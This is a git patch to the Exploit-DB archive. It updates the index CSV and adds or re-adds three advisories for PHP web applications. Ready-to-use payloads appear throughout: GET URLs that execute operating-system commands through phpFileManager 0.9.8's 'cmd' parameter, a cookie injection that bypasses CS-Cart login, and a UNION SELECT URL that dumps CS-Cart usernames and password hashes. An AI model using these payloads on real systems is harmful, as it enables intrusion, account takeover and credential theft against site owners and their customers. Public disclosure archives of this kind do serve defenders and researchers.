From 7c8d57574c6cf68dc869014777237c865cdbddbc Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Wed, 29 Jul 2015 05:02:25 +0000
Subject: [PATCH] DB: 2015-07-29

1 new exploits
---
 files.csv                       |   9 ++-
 platforms/php/webapps/37709.txt | 115 ++++++++++++++++++++++++++++
 platforms/php/webapps/6352.txt  | 128 ++++++++++++++++----------------
 platforms/php/webapps/8184.txt  |  34 ++++-----
 4 files changed, 201 insertions(+), 85 deletions(-)
 create mode 100755 platforms/php/webapps/37709.txt

diff --git a/files.csv b/files.csv
index 8e961b36e..4f0fc6243 100755
--- a/files.csv
+++ b/files.csv
@@ -5935,7 +5935,7 @@ id,file,description,date,author,platform,type,port
 6349,platforms/php/webapps/6349.txt,"Reciprocal Links Manager 1.1 (site) SQL Injection Vulnerability",2008-09-02,"Hussin X",php,webapps,0
 6350,platforms/php/webapps/6350.txt,"AJ HYIP ACME (comment.php artid) SQL Injection Vulnerability",2008-09-02,"security fears team",php,webapps,0
 6351,platforms/php/webapps/6351.txt,"AJ HYIP ACME (readarticle.php artid) SQL Injection Vulnerability",2008-09-02,InjEctOr5,php,webapps,0
-6352,platforms/php/webapps/6352.txt,"CS-Cart <= 1.3.5 (Auth Bypass) SQL Injection Vulnerability",2008-09-02,"GulfTech Security",php,webapps,0
+6352,platforms/php/webapps/6352.txt,"CS-Cart <= 1.3.5 - (Auth Bypass) SQL Injection Vulnerability",2008-09-02,"GulfTech Security",php,webapps,0
 6353,platforms/windows/dos/6353.txt,"Google Chrome Browser 0.2.149.27 - DoS Vulnerability",2008-09-03,"Rishi Narang",windows,dos,0
 6354,platforms/php/webapps/6354.txt,"Spice Classifieds (cat_path) Remote SQL Injection Vulnerability",2008-09-03,InjEctOr5,php,webapps,0
 6355,platforms/windows/remote/6355.txt,"Google Chrome Browser 0.2.149.27 Automatic File Download Exploit",2008-09-03,nerex,windows,remote,0
@@ -7700,7 +7700,7 @@ id,file,description,date,author,platform,type,port
 8181,platforms/php/webapps/8181.c,"PHP Director <= 0.21 (sql into outfile) eval() Injection Exploit",2009-03-09,StAkeR,php,webapps,0
 8182,platforms/php/webapps/8182.txt,"PHPRecipeBook 2.24 (base_id) Remote SQL Injection Vulnerability",2009-03-09,d3b4g,php,webapps,0
 8183,platforms/php/webapps/8183.txt,"woltlab burning board 3.0.x - Multiple Vulnerabilities",2009-03-09,StAkeR,php,webapps,0
-8184,platforms/php/webapps/8184.txt,"CS-Cart 2.0.0 Beta 3 (product_id) SQL Injection Vulnerability",2009-03-09,netsoul,php,webapps,0
+8184,platforms/php/webapps/8184.txt,"CS-Cart 2.0.0 Beta 3 - (product_id) SQL Injection Vulnerability",2009-03-09,netsoul,php,webapps,0
 8185,platforms/php/webapps/8185.txt,"phpCommunity 2.1.8 (SQL/DT/XSS) Multiple Vulnerabilities",2009-03-09,"Salvatore Fresta",php,webapps,0
 8186,platforms/php/webapps/8186.txt,"PHP-Fusion Mod Book Panel (bookid) SQL Injection Vulnerability",2009-03-09,elusiven,php,webapps,0
 8187,platforms/hardware/dos/8187.sh,"Addonics NAS Adapter Post-Auth Denial of Service Exploit",2009-03-09,h00die,hardware,dos,0
@@ -24156,7 +24156,7 @@ id,file,description,date,author,platform,type,port
 27027,platforms/php/webapps/27027.txt,"Jax Calendar 1.34 Jax_calendar.PHP SQL Injection Vulnerability",2005-12-26,r0t3d3Vil,php,webapps,0
 27028,platforms/php/webapps/27028.txt,"LogicBill 1.0 - Multiple SQL Injection Vulnerabilities",2005-12-25,r0t3d3Vil,php,webapps,0
 27029,platforms/php/webapps/27029.txt,"EZ Invoice Inc. EZI 2.0 Invoices.PHP SQL Injection Vulnerability",2005-12-25,r0t3d3Vil,php,webapps,0
-27030,platforms/php/webapps/27030.txt,"CS-Cart Multiple SQL Injection Vulnerabilities",2005-12-25,r0t3d3Vil,php,webapps,0
+27030,platforms/php/webapps/27030.txt,"CS-Cart - Multiple SQL Injection Vulnerabilities",2005-12-25,r0t3d3Vil,php,webapps,0
 27031,platforms/linux/dos/27031.c,"Linux Kernel 2.6.x - SET_MEMPOLICY Local Denial of Service Vulnerability",2006-01-04,"Doug Chapman",linux,dos,0
 27032,platforms/linux/remote/27032.txt,"Hylafax 4.1/4.2 - Multiple Scripts Remote Command Execution Vulnerability",2006-01-05,"Patrice Fournier",linux,remote,0
 27033,platforms/php/webapps/27033.txt,"Foro Domus 2.10 - Multiple Input Validation Vulnerabilities",2006-01-06,"Aliaksandr Hartsuyeu",php,webapps,0
@@ -32534,7 +32534,7 @@ id,file,description,date,author,platform,type,port
 36090,platforms/php/webapps/36090.txt,"ClickCMS Denial of Service Vulnerability and CAPTCHA Bypass Vulnerability",2011-08-29,MustLive,php,webapps,0
 36091,platforms/php/webapps/36091.txt,"IBM Open Admin Tool 2.71 Multiple Cross Site Scripting Vulnerabilities",2011-08-30,"Sumit Kumar Soni",php,webapps,0
 36092,platforms/windows/dos/36092.pl,"MapServer <= 6.0 Map File Double Free Remote Denial of Service Vulnerability",2011-08-30,rouault,windows,dos,0
-36093,platforms/php/webapps/36093.txt,"CS-Cart 2.2.1 'products.php' SQL Injection Vulnerability",2011-08-30,Net.Edit0r,php,webapps,0
+36093,platforms/php/webapps/36093.txt,"CS-Cart 2.2.1 - 'products.php' SQL Injection Vulnerability",2011-08-30,Net.Edit0r,php,webapps,0
 36094,platforms/php/webapps/36094.txt,"TinyWebGallery 1.8.4 Local File Include and SQL Injection Vulnerabilities",2011-08-31,KedAns-Dz,php,webapps,0
 36095,platforms/php/webapps/36095.txt,"Serendipity 1.5.1 'research_display.php' SQL Injection Vulnerability",2011-08-31,The_Exploited,php,webapps,0
 36096,platforms/php/webapps/36096.txt,"Web Professional 'default.php' SQL Injection Vulnerability",2011-08-31,The_Exploited,php,webapps,0
@@ -34036,3 +34036,4 @@ id,file,description,date,author,platform,type,port
 37705,platforms/php/webapps/37705.txt,"WordPress Unite Gallery Lite Plugin 1.4.6 - Multiple Vulnerabilities",2015-07-27,"Nitin Venkatesh",php,webapps,80
 37707,platforms/php/webapps/37707.txt,"WordPress Count Per Day Plugin 3.4 - SQL Injection",2015-07-27,"High-Tech Bridge SA",php,webapps,80
 37708,platforms/php/webapps/37708.txt,"Xceedium Xsuite - Multiple Vulnerabilities",2015-07-27,modzero,php,webapps,0
+37709,platforms/php/webapps/37709.txt,"phpFileManager 0.9.8 - Remote Command Execution Vulnerability",2015-07-28,"John Page",php,webapps,0
diff --git a/platforms/php/webapps/37709.txt b/platforms/php/webapps/37709.txt
new file mode 100755
index 000000000..db026400c
--- /dev/null
+++ b/platforms/php/webapps/37709.txt
@@ -0,0 +1,115 @@
+# Exploit Title: Remote Command Execution
+# Google Dork: intitle: PHP Remote Command Execution
+# Date: 2015-07-28
+# Exploit Author:  John Page ( hyp3rlinx )
+# Website: hyp3rlinx.altervista.org
+# Vendor Homepage: phpfm.sourceforge.net
+# Software Link:  phpfm.sourceforge.net
+# Version: 0.9.8
+# Tested on: windows 7 SP1
+# Category: Webapps
+
+
+
+Vendor:
+================================
+phpfm.sourceforge.net
+
+
+
+Product:
+================================
+phpFileManager version 0.9.8
+
+
+Vulnerability Type:
+========================
+Remote Command Execution
+
+
+CVE Reference:
+==============
+N/A
+
+
+
+Advisory Information:
+=======================================================
+Remote Command Execution Vulnerability
+
+
+
+
+Vulnerability Details:
+=====================
+PHPFileManager is vulnerable to remote command execution
+and will call operating system commands via GET requests
+from a victims browser. By getting the victim to click our malicious link
+or visit our malicious website.
+
+
+
+
+Exploit code(s):
+===============
+
+
+Remote Command Execution:
+-------------------------
+
+1- call Windows cmd.exe
+
+https://localhost/phpFileManager-0.9.8/index.php?action=6&current_dir=C:/xampp/htdocs/phpFileManager-0.9.8/&cmd=c%3A\Windows\system32\cmd.exe
+<https://localhost/phpFileManager-0.9.8/index.php?action=6&current_dir=C:/xampp/htdocs/phpFileManager-0.9.8/&cmd=c%3A%5CWindows%5Csystem32%5Ccmd.exe>
+
+2- Run Windows calc.exe
+
+https://localhost/phpFileManager-0.9.8/index.php?action=6&current_dir=C:/xampp/htdocs/phpFileManager-0.9.8/&cmd=c%3A\Windows\system32\calc.exe
+<https://localhost/phpFileManager-0.9.8/index.php?action=6&current_dir=C:/xampp/htdocs/phpFileManager-0.9.8/&cmd=c%3A%5CWindows%5Csystem32%5Ccalc.exe>
+
+
+
+Disclosure Timeline:
+=========================================================
+
+Vendor Notification:  NA
+July 28, 2015 : Public Disclosure
+
+
+
+Severity Level:
+=========================================================
+High
+
+
+
+Description:
+==========================================================
+
+
+Request Method(s):          [+] GET
+
+
+Vulnerable Product:         [+]  phpFileManager  0.9.8
+
+
+Vulnerable Parameter(s):    [+] 'cmd'= [OS command]
+
+
+Affected Area(s):           [+] Operating System
+
+
+===========================================================
+
+[+] Disclaimer
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and that due
+credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit is given to
+the author.
+The author is not responsible for any misuse of the information contained
+herein and prohibits any malicious use of all security related information
+or exploits by the author or elsewhere.
+
+
+by hyp3rlinx
diff --git a/platforms/php/webapps/6352.txt b/platforms/php/webapps/6352.txt
index 1eefccbdc..e581f4ecc 100755
--- a/platforms/php/webapps/6352.txt
+++ b/platforms/php/webapps/6352.txt
@@ -1,64 +1,64 @@
-##########################################################
-# GulfTech Security Research           September 02, 2008
-##########################################################
-# Vendor : CS-Cart.com
-# URL : http://www.cs-cart.com/
-# Version : CS-Cart <= 1.3.5
-# Risk : SQL Injection
-##########################################################
-
-
-Description:
-CS-Cart Cart is a full featured online ecommerce application written
-in php that allows users to build, run and promote an online store.
-There is unfortunately a fairly serious SQL Injection issue within
-CS-Cart that can be used to easily take over user and administrator
-accounts, as well as used to retrieve arbitrary data from the database.
-The CS-Cart team have released an updated version of CS-Cart to resolve
-this issue, and users should upgrade as soon as possible.
-
-
-SQL Injection:
-There is a fairly serious SQL Injection issue in CS-Cart that, as
-mentioned before, allows attackers to easily bypass authentication, or
-retrieve arbitrary data from the underlying database. The vulnerable
-code can be found in /core/user.php
-
-if (fn_get_cookie(AREA_NAME . '_user_id')) {
-    $udata = db_get_row("SELECT user_id, user_type, tax_exempt, last_login, membership_status,
-    membership_id FROM $db_tables[users] WHERE user_id='".fn_get_cookie(AREA_NAME . '_user_id')."'
-    AND password='".fn_get_cookie(AREA_NAME . '_password')."'");
-    fn_define('LOGGED_VIA_COOKIE', true);
-}
-
-At the time of discovering this issue the fn_get_cookie() function did
-nothing more than check if the specified cookie value was present, if
-it was then it returned the value. This of course allowed for an SQL
-Injection issue since an attacker can easily specify cookie data.
-
-cs_cookies[customer_user_id]=1'/*;
-
-For example an attacker could specify a cookie like the one shown above
-and successfully log in as the customer with the id of 1 without ever
-actually authenticating. Alternatively just about any data can be
-retrieved via this method also since the injection happens right in the
-middle of a select statement.
-
-
-
-Solution:
-An updated version of CS-Cart has been released to address these issues
-and users can upgrade by visiting the CS-Cart website.
-
-
-
-Credits:
-James Bercegay of the GulfTech Security Research Team
-
-
-
-Related Info:
-The original advisory can be found at the following location
-http://www.gulftech.org/?node=research&article_id=00128-09022008
-
-# milw0rm.com [2008-09-02]
+##########################################################
+# GulfTech Security Research           September 02, 2008
+##########################################################
+# Vendor : CS-Cart.com
+# URL : http://www.cs-cart.com/
+# Version : CS-Cart <= 1.3.5
+# Risk : SQL Injection
+##########################################################
+
+
+Description:
+CS-Cart Cart is a full featured online ecommerce application written
+in php that allows users to build, run and promote an online store.
+There is unfortunately a fairly serious SQL Injection issue within
+CS-Cart that can be used to easily take over user and administrator
+accounts, as well as used to retrieve arbitrary data from the database.
+The CS-Cart team have released an updated version of CS-Cart to resolve
+this issue, and users should upgrade as soon as possible.
+
+
+SQL Injection:
+There is a fairly serious SQL Injection issue in CS-Cart that, as
+mentioned before, allows attackers to easily bypass authentication, or
+retrieve arbitrary data from the underlying database. The vulnerable
+code can be found in /core/user.php
+
+if (fn_get_cookie(AREA_NAME . '_user_id')) {
+    $udata = db_get_row("SELECT user_id, user_type, tax_exempt, last_login, membership_status,
+    membership_id FROM $db_tables[users] WHERE user_id='".fn_get_cookie(AREA_NAME . '_user_id')."'
+    AND password='".fn_get_cookie(AREA_NAME . '_password')."'");
+    fn_define('LOGGED_VIA_COOKIE', true);
+}
+
+At the time of discovering this issue the fn_get_cookie() function did
+nothing more than check if the specified cookie value was present, if
+it was then it returned the value. This of course allowed for an SQL
+Injection issue since an attacker can easily specify cookie data.
+
+cs_cookies[customer_user_id]=1'/*;
+
+For example an attacker could specify a cookie like the one shown above
+and successfully log in as the customer with the id of 1 without ever
+actually authenticating. Alternatively just about any data can be
+retrieved via this method also since the injection happens right in the
+middle of a select statement.
+
+
+
+Solution:
+An updated version of CS-Cart has been released to address these issues
+and users can upgrade by visiting the CS-Cart website.
+
+
+
+Credits:
+James Bercegay of the GulfTech Security Research Team
+
+
+
+Related Info:
+The original advisory can be found at the following location
+http://www.gulftech.org/?node=research&article_id=00128-09022008
+
+# milw0rm.com [2008-09-02]
diff --git a/platforms/php/webapps/8184.txt b/platforms/php/webapps/8184.txt
index e2303716d..999b6df4e 100755
--- a/platforms/php/webapps/8184.txt
+++ b/platforms/php/webapps/8184.txt
@@ -1,17 +1,17 @@
-CS-Cart 2.0.0 Beta 3 (dispatch) SQL Injection Vulnerability
-Provider: www.cs-cart.com
-Discovered by netsoul
-Greetz: m1cr0n, IvanKalet, blackfalcon, str0ke
-Contact: netsoul2[at]gmail.com
-ALTO PARANA - PARAGUAY
-Ã‘ane mba'e teete
-#####################################################
-
-Exploit:
-
-http://cs-cart cms/[path]/index.php?dispatch=products.view&product_id=289' UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,concat(user_login,0x3a,password),0,0 from cscart_users/*
-
-
-#####################################################
-
-# milw0rm.com [2009-03-09]
+CS-Cart 2.0.0 Beta 3 (dispatch) SQL Injection Vulnerability
+Provider: www.cs-cart.com
+Discovered by netsoul
+Greetz: m1cr0n, IvanKalet, blackfalcon, str0ke
+Contact: netsoul2[at]gmail.com
+ALTO PARANA - PARAGUAY
+Ã‘ane mba'e teete
+#####################################################
+
+Exploit:
+
+http://cs-cart cms/[path]/index.php?dispatch=products.view&product_id=289' UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,concat(user_login,0x3a,password),0,0 from cscart_users/*
+
+
+#####################################################
+
+# milw0rm.com [2009-03-09]